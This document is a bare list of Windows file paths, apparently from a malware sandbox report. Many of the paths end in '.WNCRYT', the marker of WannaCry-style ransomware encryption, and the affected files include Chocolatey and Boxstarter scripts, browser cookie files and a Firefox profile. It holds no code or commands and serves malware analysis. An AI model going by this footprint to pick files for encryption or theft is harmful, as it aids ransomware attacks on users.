file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-NativeInstallerExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Set-PowerShellExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\7zip.install\legal\VERIFICATION.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyUninstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\chocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\NOTICE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\VERIFICATION.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxStarter.bat.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\NOTICE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\VERIFICATION.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\NOTICE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\VERIFICATION.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\NOTICE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\VERIFICATION.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\NOTICE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\VERIFICATION.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-DefaultChocolateyLocalFilePath.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-NativeInstallerExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Set-PowerShellExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-NativeInstallerExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Set-PowerShellExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\data.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\data.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\dotnetfx\tools\ChocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\KB3033929\Tools\ChocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\tools\chocolateyinstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyBeforeModify.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyinstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyuninstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\python3\legal\VERIFICATION.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyinstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyuninstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\vcredist140\tools\data.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyUninstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\winrar\tools\helpers.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyuninstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\tools\checksum.license.txt.WNCRYT
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\chrome_shutdown_ms.txt.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrivePersonal.cmd.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\errorIcon.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\folder.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\loading.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0YHW5220.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\4GSWQ8EN.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\AJGBO9CI.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CAP0QFT4.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CJNGZV8R.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ERX8C8MI.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\F003S46Q.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\H6EPX8R1.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J29G05RA.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J52208RT.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\MIYBJCU5.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\NFUEBPFN.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\U7UAY5KN.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\UKC8F8RG.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\VGVG2939.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WFG456IG.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\X8F9LSJ0.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YM639DI1.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YX6BCVUK.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\AlternateServices.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\pkcs11.txt.WNCRYT
file: C:\ba69bdf0a250e352360c33\netfx_Full.mzz.WNCRYT
file: C:\Users\user\AppData\Local\Temp\0.WNCRYT
file: C:\Users\user\AppData\Local\Temp\hibsys.WNCRYT
file: C:\ba69bdf0a250e352360c33\1025\eula.rtf
file: C:\ba69bdf0a250e352360c33\1028\eula.rtf
file: C:\ba69bdf0a250e352360c33\1029\eula.rtf
file: C:\ba69bdf0a250e352360c33\1030\eula.rtf
file: C:\ba69bdf0a250e352360c33\1031\eula.rtf
file: C:\ba69bdf0a250e352360c33\1032\eula.rtf
file: C:\ba69bdf0a250e352360c33\1033\eula.rtf
file: C:\ba69bdf0a250e352360c33\1035\eula.rtf
file: C:\ba69bdf0a250e352360c33\1036\eula.rtf
file: C:\ba69bdf0a250e352360c33\1037\eula.rtf
file: C:\ba69bdf0a250e352360c33\1038\eula.rtf
file: C:\ba69bdf0a250e352360c33\1040\eula.rtf
file: C:\ba69bdf0a250e352360c33\1041\eula.rtf
file: C:\ba69bdf0a250e352360c33\1042\eula.rtf
file: C:\ba69bdf0a250e352360c33\1043\eula.rtf
file: C:\ba69bdf0a250e352360c33\1044\eula.rtf
file: C:\ba69bdf0a250e352360c33\1045\eula.rtf
file: C:\ba69bdf0a250e352360c33\1046\eula.rtf
file: C:\ba69bdf0a250e352360c33\1049\eula.rtf
file: C:\ba69bdf0a250e352360c33\1053\eula.rtf
file: C:\ba69bdf0a250e352360c33\1055\eula.rtf
file: C:\ba69bdf0a250e352360c33\2052\eula.rtf
file: C:\ba69bdf0a250e352360c33\2070\eula.rtf
file: C:\ba69bdf0a250e352360c33\3082\eula.rtf
file: C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.fPMufFfM.20251206093923.txt
file: C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.S6TbHpZ5.20251206094405.txt
file: C:\Sysmon\sysmonconfig.txt
file: C:\Users\All Users\Boxstarter\LICENSE.txt
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt
file: C:\Users\All Users\chocolatey\CREDITS.txt
file: C:\Users\All Users\chocolatey\lib\7zip.install\legal\LICENSE.txt
file: C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\license.txt
file: C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\VERIFICATION.txt
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\LICENSE.txt
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\LICENSE.txt
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\LICENSE.txt
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\LICENSE.txt
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\LICENSE.txt
file: C:\Users\All Users\chocolatey\lib\Firefox\tools\LanguageChecksums.csv
file: C:\Users\All Users\chocolatey\lib\openjdk\openjdk-19.0.1_windows-x64_bin.zip.txt
file: C:\Users\All Users\chocolatey\lib\powershell-core\tools\ThirdPartyNotices.txt
file: C:\Users\All Users\chocolatey\lib\python3\legal\LICENSE.txt
file: C:\Users\All Users\chocolatey\lib\winrar\tools\downloadInfo.csv
file: C:\Users\All Users\chocolatey\tools\7zip.license.txt
file: C:\Users\All Users\chocolatey\tools\shimgen.license.txt
file: C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg
file: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg
file: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg
file: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg
file: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg
file: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg
file: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg
file: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg
file: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ThirdPartyNotices.txt
file: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\main.jpg
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
file: C:\Users\user\AppData\Roaming\Microsoft\Windows Photo Viewer\Windows Photo Viewer Wallpaper.jpg
file: C:\BOOTSECT.BAK
file: C:\ba69bdf0a250e352360c33\header.bmp
file: C:\ba69bdf0a250e352360c33\SplashScreen.bmp
file: C:\ba69bdf0a250e352360c33\watermark.bmp
file: C:\Users\All Users\Boxstarter\BoxstarterShell.ps1
file: C:\Users\All Users\Boxstarter\chocolateyUninstall.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-PendingReboot.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Init-Settings.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Reboot.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Start-UpdateServices.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Test-PendingReboot.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Boxstarter.zip
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Chocolatey.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-PackageRoot.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Init-Settings.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\invoke-chocolatey.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-PackageFromScript.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Send-File.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Confirm-Choice.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Create-BoxstarterTask.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Enter-DotNet4.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Format-BoxStarterMessage.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-CurrentUser.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-HttpResource.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsRemote.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Init-Settings.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-FromTask.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-RetriableScript.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Log-BoxStarterMessage.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Out-BoxstarterLog.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterError.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterTask.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Start-TimedSection.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Stop-TimedSection.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Test-Admin.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterLogo.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterMessage.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVM.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-BingSearch.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-GameBarTips.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-UAC.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-UAC.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-LibraryNames.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-UAC.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Install-WindowsUpdate.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Move-LibraryDirectory.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Restart-Explorer.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-ExplorerOptions.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-StartScreenOptions.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-TaskbarSmall.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1
file: C:\Users\All Users\chocolatey\bin\RefreshEnv.cmd
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-PackageParameters.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-UninstallRegistryKey.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Install-ChocolateyDesktopLink.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateyFailure.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateySuccess.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-FileUpdateLog.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AppInstallLocation.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AvailableDriveLetter.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-EffectiveProxy.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-PackageCacheLocation.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-WebContent.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Register-Application.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Remove-Process.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\DotNetFrameworkHelpers.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Install-ChocolateyInstallPackageAndHandleExitCode.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-WindowsUpdateErrorDescription.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-ChocolateyPackageAndHandleExitCode.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-WindowsUpdate.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Test-WindowsUpdate.ps1
file: C:\Users\All Users\chocolatey\helpers\chocolateyScriptRunner.ps1
file: C:\Users\All Users\chocolatey\helpers\ChocolateyTabExpansion.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Format-FileSize.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-CheckSumValid.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyPath.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyUnzip.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyWebFile.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariable.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariableNames.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-FtpFile.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-OSArchitectureWidth.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-PackageParameters.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-ToolsLocation.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-UACEnabled.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-UninstallRegistryKey.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-VirusCheckValid.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-WebFile.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-WebFileName.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Get-WebHeaders.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-BinFile.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyEnvironmentVariable.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyExplorerMenuItem.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyFileAssociation.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyInstallPackage.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPackage.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPath.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPinnedTaskBarItem.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPowershellCommand.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyShortcut.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyVsixPackage.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyZipPackage.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Install-Vsix.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Set-EnvironmentVariable.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Set-PowerShellExitCode.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Start-ChocolateyProcessAsAdmin.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Test-ProcessAdminRights.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Uninstall-BinFile.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyEnvironmentVariable.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyPackage.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\UnInstall-ChocolateyZipPackage.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Update-SessionEnvironment.ps1
file: C:\Users\All Users\chocolatey\helpers\functions\Write-FunctionCallLogMessage.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter\tools\chocolateyinstall.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\chocolateyinstall.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\setup.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-PendingReboot.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Init-Settings.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Reboot.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Start-UpdateServices.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Test-PendingReboot.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxstarterShell.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyinstall.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyUninstall.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\setup.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Boxstarter.zip
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Chocolatey.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1
